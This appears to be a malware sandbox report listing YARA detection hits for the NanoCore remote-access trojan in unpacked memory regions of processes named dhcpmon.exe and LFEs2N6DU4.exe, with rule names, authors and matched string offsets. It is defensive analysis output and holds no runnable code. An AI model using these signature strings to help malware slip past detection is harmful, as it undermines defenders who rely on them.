22.2.dhcpmon.exe.3c09b70.3.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
22.2.dhcpmon.exe.3c09b70.3.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
22.2.dhcpmon.exe.3c09b70.3.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
22.2.dhcpmon.exe.3c09b70.3.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
22.2.dhcpmon.exe.3be1b50.4.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
22.2.dhcpmon.exe.3be1b50.4.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0x32b25:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
22.2.dhcpmon.exe.3be1b50.4.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
22.2.dhcpmon.exe.3be1b50.4.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0x32b15:$a: NanoCore 0x32b25:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0x32b74:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q
20.2.LFEs2N6DU4.exe.3141390.1.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
20.2.LFEs2N6DU4.exe.3141390.1.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0xe3b7:$s5: IClientLoggingHost
20.2.LFEs2N6DU4.exe.3141390.1.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q 0xf0fc:$j: #=q 0xf118:$j: #=q
25.2.dhcpmon.exe.3bfb78e.5.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe75:$x1: NanoCore.ClientPluginHost 0x145e3:$x1: NanoCore.ClientPluginHost 0x2d5f7:$x1: NanoCore.ClientPluginHost 0xe8f:$x2: IClientNetworkHost 0x14610:$x2: IClientNetworkHost 0x2d624:$x2: IClientNetworkHost
25.2.dhcpmon.exe.3bfb78e.5.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe75:$x2: NanoCore.ClientPluginHost 0x145e3:$x2: NanoCore.ClientPluginHost 0x2d5f7:$x2: NanoCore.ClientPluginHost 0x1261:$s3: PipeExists 0x1136:$s4: PipeCreated 0x156be:$s4: PipeCreated 0x2e6d2:$s4: PipeCreated 0xeb0:$s5: IClientLoggingHost 0x145fd:$s5: IClientLoggingHost 0x2d611:$s5: IClientLoggingHost
25.2.dhcpmon.exe.3bfb78e.5.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
25.2.dhcpmon.exe.3bfb78e.5.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xddf:$a: NanoCore 0xe38:$a: NanoCore 0xe75:$a: NanoCore 0xeee:$a: NanoCore 0x14599:$a: NanoCore 0x145ae:$a: NanoCore 0x145e3:$a: NanoCore 0x2d5ad:$a: NanoCore 0x2d5c2:$a: NanoCore 0x2d5f7:$a: NanoCore 0xe41:$b: ClientPlugin 0xe7e:$b: ClientPlugin 0x177c:$b: ClientPlugin 0x1789:$b: ClientPlugin 0x14355:$b: ClientPlugin 0x14370:$b: ClientPlugin 0x143a0:$b: ClientPlugin 0x145b7:$b: ClientPlugin 0x145ec:$b: ClientPlugin 0x2d369:$b: ClientPlugin 0x2d384:$b: ClientPlugin
25.2.dhcpmon.exe.2c19698.2.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe75:$x1: NanoCore.ClientPluginHost 0xe8f:$x2: IClientNetworkHost
25.2.dhcpmon.exe.2c19698.2.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe75:$x2: NanoCore.ClientPluginHost 0x1261:$s3: PipeExists 0x1136:$s4: PipeCreated 0xeb0:$s5: IClientLoggingHost
24.2.LFEs2N6DU4.exe.41c4bed.5.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xb184:$x1: NanoCore.ClientPluginHost 0x24198:$x1: NanoCore.ClientPluginHost 0xb1b1:$x2: IClientNetworkHost 0x241c5:$x2: IClientNetworkHost
24.2.LFEs2N6DU4.exe.41c4bed.5.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xb184:$x2: NanoCore.ClientPluginHost 0x24198:$x2: NanoCore.ClientPluginHost 0xc25f:$s4: PipeCreated 0x25273:$s4: PipeCreated 0xb19e:$s5: IClientLoggingHost 0x241b2:$s5: IClientLoggingHost
24.2.LFEs2N6DU4.exe.41c4bed.5.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
25.2.dhcpmon.exe.400000.0.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
25.2.dhcpmon.exe.400000.0.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
25.2.dhcpmon.exe.400000.0.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
25.2.dhcpmon.exe.400000.0.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
13.2.LFEs2N6DU4.exe.400000.0.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
13.2.LFEs2N6DU4.exe.400000.0.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
13.2.LFEs2N6DU4.exe.400000.0.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
13.2.LFEs2N6DU4.exe.400000.0.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
13.2.LFEs2N6DU4.exe.5654629.8.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xb184:$x1: NanoCore.ClientPluginHost 0xb1b1:$x2: IClientNetworkHost
13.2.LFEs2N6DU4.exe.5654629.8.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xb184:$x2: NanoCore.ClientPluginHost 0xc25f:$s4: PipeCreated 0xb19e:$s5: IClientLoggingHost
13.2.LFEs2N6DU4.exe.5654629.8.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
20.2.LFEs2N6DU4.exe.4199b70.4.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
20.2.LFEs2N6DU4.exe.4199b70.4.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
20.2.LFEs2N6DU4.exe.4199b70.4.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
20.2.LFEs2N6DU4.exe.4199b70.4.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
20.2.LFEs2N6DU4.exe.3141390.1.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
20.2.LFEs2N6DU4.exe.3141390.1.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x101b7:$s5: IClientLoggingHost
21.2.dhcpmon.exe.3831b50.3.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x381ad:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x381ea:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x3bd1d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
21.2.dhcpmon.exe.3831b50.3.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x37f25:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x381ad:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x397e6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x397da:$s2: FileCommand 0x1266b:$s3: PipeExists 0x3a68b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x40442:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost 0x381d7:$s5: IClientLoggingHost
13.2.LFEs2N6DU4.exe.3deb78e.5.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe75:$x1: NanoCore.ClientPluginHost 0x145e3:$x1: NanoCore.ClientPluginHost 0x2d5f7:$x1: NanoCore.ClientPluginHost 0xe8f:$x2: IClientNetworkHost 0x14610:$x2: IClientNetworkHost 0x2d624:$x2: IClientNetworkHost
13.2.LFEs2N6DU4.exe.3deb78e.5.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe75:$x2: NanoCore.ClientPluginHost 0x145e3:$x2: NanoCore.ClientPluginHost 0x2d5f7:$x2: NanoCore.ClientPluginHost 0x1261:$s3: PipeExists 0x1136:$s4: PipeCreated 0x156be:$s4: PipeCreated 0x2e6d2:$s4: PipeCreated 0xeb0:$s5: IClientLoggingHost 0x145fd:$s5: IClientLoggingHost 0x2d611:$s5: IClientLoggingHost
13.2.LFEs2N6DU4.exe.3deb78e.5.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
13.2.LFEs2N6DU4.exe.3deb78e.5.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xddf:$a: NanoCore 0xe38:$a: NanoCore 0xe75:$a: NanoCore 0xeee:$a: NanoCore 0x14599:$a: NanoCore 0x145ae:$a: NanoCore 0x145e3:$a: NanoCore 0x2d5ad:$a: NanoCore 0x2d5c2:$a: NanoCore 0x2d5f7:$a: NanoCore 0xe41:$b: ClientPlugin 0xe7e:$b: ClientPlugin 0x177c:$b: ClientPlugin 0x1789:$b: ClientPlugin 0x14355:$b: ClientPlugin 0x14370:$b: ClientPlugin 0x143a0:$b: ClientPlugin 0x145b7:$b: ClientPlugin 0x145ec:$b: ClientPlugin 0x2d369:$b: ClientPlugin 0x2d384:$b: ClientPlugin
22.2.dhcpmon.exe.3be1b50.4.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x381ad:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x381ea:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x3bd1d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
22.2.dhcpmon.exe.3be1b50.4.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x37f25:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x381ad:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x397e6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x397da:$s2: FileCommand 0x1266b:$s3: PipeExists 0x3a68b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x40442:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost 0x381d7:$s5: IClientLoggingHost
22.2.dhcpmon.exe.3be1b50.4.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
22.2.dhcpmon.exe.3be1b50.4.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0x37f15:$a: NanoCore 0x37f25:$a: NanoCore 0x38159:$a: NanoCore 0x3816d:$a: NanoCore 0x381ad:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x37f74:$b: ClientPlugin 0x38176:$b: ClientPlugin 0x381b6:$b: ClientPlugin 0x1007b:$c: ProjectData 0x3809b:$c: ProjectData 0x10a82:$d: DESCrypto 0x38aa2:$d: DESCrypto 0x1844e:$e: KeepAlive
20.2.LFEs2N6DU4.exe.3141390.1.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q 0x10efc:$j: #=q 0x10f18:$j: #=q
21.2.dhcpmon.exe.3831b50.3.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
21.2.dhcpmon.exe.3831b50.3.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0x37f15:$a: NanoCore 0x37f25:$a: NanoCore 0x38159:$a: NanoCore 0x3816d:$a: NanoCore 0x381ad:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x37f74:$b: ClientPlugin 0x38176:$b: ClientPlugin 0x381b6:$b: ClientPlugin 0x1007b:$c: ProjectData 0x3809b:$c: ProjectData 0x10a82:$d: DESCrypto 0x38aa2:$d: DESCrypto 0x1844e:$e: KeepAlive
21.2.dhcpmon.exe.3831b50.3.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
21.2.dhcpmon.exe.3831b50.3.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0x32b25:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
21.2.dhcpmon.exe.3831b50.3.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
21.2.dhcpmon.exe.3831b50.3.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0x32b15:$a: NanoCore 0x32b25:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0x32b74:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q
24.2.LFEs2N6DU4.exe.31d96e0.2.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe75:$x1: NanoCore.ClientPluginHost 0xe8f:$x2: IClientNetworkHost
24.2.LFEs2N6DU4.exe.31d96e0.2.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe75:$x2: NanoCore.ClientPluginHost 0x1261:$s3: PipeExists 0x1136:$s4: PipeCreated 0xeb0:$s5: IClientLoggingHost
20.2.LFEs2N6DU4.exe.41e9b90.5.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0xc3a9d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0xc3ada:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0xc760d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
20.2.LFEs2N6DU4.exe.41e9b90.5.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
20.2.LFEs2N6DU4.exe.41e9b90.5.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xc3805:$a: NanoCore 0xc3815:$a: NanoCore 0xc3a49:$a: NanoCore 0xc3a5d:$a: NanoCore 0xc3a9d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0xc3864:$b: ClientPlugin 0xc3a66:$b: ClientPlugin 0xc3aa6:$b: ClientPlugin 0x1007b:$c: ProjectData 0xc398b:$c: ProjectData 0x10a82:$d: DESCrypto 0xc4392:$d: DESCrypto 0x1844e:$e: KeepAlive
22.2.dhcpmon.exe.3c09b70.3.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
22.2.dhcpmon.exe.3c09b70.3.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
22.2.dhcpmon.exe.3c09b70.3.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
22.2.dhcpmon.exe.3c09b70.3.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
13.2.LFEs2N6DU4.exe.2dcecf4.2.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe75:$x1: NanoCore.ClientPluginHost 0xe8f:$x2: IClientNetworkHost
13.2.LFEs2N6DU4.exe.2dcecf4.2.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe75:$x2: NanoCore.ClientPluginHost 0x1261:$s3: PipeExists 0x1136:$s4: PipeCreated 0xeb0:$s5: IClientLoggingHost
24.2.LFEs2N6DU4.exe.41bb78e.4.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe75:$x1: NanoCore.ClientPluginHost 0x145e3:$x1: NanoCore.ClientPluginHost 0x2d5f7:$x1: NanoCore.ClientPluginHost 0xe8f:$x2: IClientNetworkHost 0x14610:$x2: IClientNetworkHost 0x2d624:$x2: IClientNetworkHost
24.2.LFEs2N6DU4.exe.41bb78e.4.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe75:$x2: NanoCore.ClientPluginHost 0x145e3:$x2: NanoCore.ClientPluginHost 0x2d5f7:$x2: NanoCore.ClientPluginHost 0x1261:$s3: PipeExists 0x1136:$s4: PipeCreated 0x156be:$s4: PipeCreated 0x2e6d2:$s4: PipeCreated 0xeb0:$s5: IClientLoggingHost 0x145fd:$s5: IClientLoggingHost 0x2d611:$s5: IClientLoggingHost
24.2.LFEs2N6DU4.exe.41bb78e.4.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
24.2.LFEs2N6DU4.exe.41bb78e.4.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xddf:$a: NanoCore 0xe38:$a: NanoCore 0xe75:$a: NanoCore 0xeee:$a: NanoCore 0x14599:$a: NanoCore 0x145ae:$a: NanoCore 0x145e3:$a: NanoCore 0x2d5ad:$a: NanoCore 0x2d5c2:$a: NanoCore 0x2d5f7:$a: NanoCore 0xe41:$b: ClientPlugin 0xe7e:$b: ClientPlugin 0x177c:$b: ClientPlugin 0x1789:$b: ClientPlugin 0x14355:$b: ClientPlugin 0x14370:$b: ClientPlugin 0x143a0:$b: ClientPlugin 0x145b7:$b: ClientPlugin 0x145ec:$b: ClientPlugin 0x2d369:$b: ClientPlugin 0x2d384:$b: ClientPlugin
22.2.dhcpmon.exe.3c59b90.5.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0xc3a9d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0xc3ada:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0xc760d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
22.2.dhcpmon.exe.3c59b90.5.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
